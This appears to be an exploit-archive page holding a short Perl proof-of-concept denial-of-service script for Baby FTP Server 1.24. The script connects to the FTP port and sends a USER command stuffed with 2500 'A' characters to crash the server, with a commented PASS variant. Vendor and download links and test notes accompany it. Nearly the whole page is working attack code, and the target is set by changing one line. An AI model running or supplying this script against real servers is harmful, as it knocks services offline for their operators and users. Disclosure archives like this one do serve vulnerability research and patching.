Baby FTP Server version 1.24 suffers from a denial of service vulnerability.
57a30ba98c73848393ea7ef56c626af98d1732a7c4117166d3a53e37bb816e21
#!/usr/bin/perl
#
#
#
###################################################################
#
# Exploit Title: Baby FTP Server Version 1.24 Denial Of Service
# Date: 2013/6/25
# Exploit Author: Chako
# Vendor Homepage: http://www.pablosoftwaresolutions.com/html/baby_ftp_server.html
# Software Download Link: http://www.pablosoftwaresolutions.com/files/babyftp.zip
# Version: 1.24
# Tested on: Windows 7
# Description:
# A bug discovered in Baby FTP Server Version 1.24 allows an attacker
# to cause a Denial of Service using a specially crafted request(USER, PASS...etc).
#
###################################################################
use IO::Socket;
$TARGET = "127.0.0.1";
$PORT = 21;
$JUNK = "\x41" x 2500;
$PAYLOAD = "USER ".$JUNK."\r\n";
#$PAYLOAD = "PASS ".$JUNK."\r\n";
$SOCKET = IO::Socket::INET->new(Proto=>'TCP',
PeerHost=>$TARGET,
PeerPort=>$PORT) or die "Error: $TARGET :$PORT\n";
$SOCKET->send($PAYLOAD);
close($SOCKET);
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed